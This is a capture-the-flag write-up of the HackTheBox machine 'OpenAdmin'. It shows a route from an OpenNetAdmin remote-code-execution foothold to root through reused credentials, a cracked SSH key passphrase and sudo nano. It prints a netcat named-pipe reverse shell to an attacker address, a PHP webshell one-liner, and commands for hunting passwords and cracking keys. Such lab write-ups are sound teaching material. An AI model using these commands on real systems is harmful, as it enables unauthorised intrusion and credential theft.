OpenAdmin — HackTheBox (write-up)¶

Difficulty: Easy Box: OpenAdmin (HackTheBox) Author: dsec Date: 2025-01-12

TL;DR¶

OpenNetAdmin (ONA) RCE led to a shell as `www-data`. Found database password reused for SSH as `jimmy`. Internal-only website on port 52846 revealed Joanna's encrypted SSH key. Cracked the key passphrase and SSH'd as `joanna`. Sudo nano GTFOBins for root.¶

Target info¶

Host: 10.129.90.175
Services discovered via nmap

Enumeration¶

Nmap results

Found /ona (OpenNetAdmin):

ONA interface

ONA version

Foothold¶

RCE exploit

Initial shell couldn't cd, so upgraded:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.14.142 4444 >/tmp/f

Upgraded shell

Found port 52846 running internally:

Internal port

/var/www/internal directory:

Internal web root

Lateral movement (www-data to jimmy)¶

Searched for credential references:

find /etc /var/log -type f -exec grep -i "joanna" {} + 2>/dev/null

grep -ril "joanna" /etc /var/log 2>/dev/null

grep results

Joanna has a sudo file, jimmy does not.

find /etc /var/log -type f -exec grep -i "password" {} + 2>/dev/null

Password search

ONA database config

Found password: xxj31ZMTZzkVA -- didn't work anywhere directly.

Database password

Found n1nj4W4rri0R! in ONA config.

SSH as jimmy

ssh jimmy@10.129.90.175
# password: n1nj4W4rri0R!

Jimmy shell

Lateral movement (jimmy to joanna)¶

Listed directories owned by jimmy:

find / -type d -user jimmy 2>/dev/null

Jimmy's directories

find / -type d -user jimmy 2>/dev/null | xargs -I {} ls -ld {}

Directory permissions

In /var/www/internal, found main.php:

main.php

And index.php with a password hash:

index.php hash

Hash: 00e302ccdcf1c60b8ad50ea50cf72b939705f49f40f0dc658801b4680b7d758eebdc2e9f9ba8ba3ef8a8bb9a796d34ba2e856838ee9bdde852b8ec3b3a0523b1

Hash cracked

Cracked to Revealed. Logged into the internal site:

Internal login

Got an encrypted SSH key. Saved as rsa_key.

Created a targeted wordlist and cracked:

grep -i ninja /usr/share/wordlists/rockyou.txt > rockyou_ninja
ssh2john rsa_key > hash.txt
john --wordlist=rockyou_ninja hash.txt

Key cracked

Passphrase: bloodninjas

ssh -i rsa_key joanna@10.129.90.175

Alternate path: Could also drop a PHP webshell in /var/www/internal since jimmy owns it:

echo '<?php system($_GET["dank"]); ?>' > dank.php

Webshell

Command execution

Then trigger a reverse shell via the webshell:

Reverse shell as joanna

Privesc¶

sudo -l

From GTFOBins for nano:

nano GTFOBins

Root shell

Lessons & takeaways¶

Search the entire filesystem for files containing usernames or "password" to find config files with reused creds
Internal-only web apps (localhost-bound ports) often contain credentials or SSH keys
Use grep to create a sub-wordlist from rockyou when you have a hint about the password pattern
find / -type d -user <username> reveals what directories a user owns, highlighting writable locations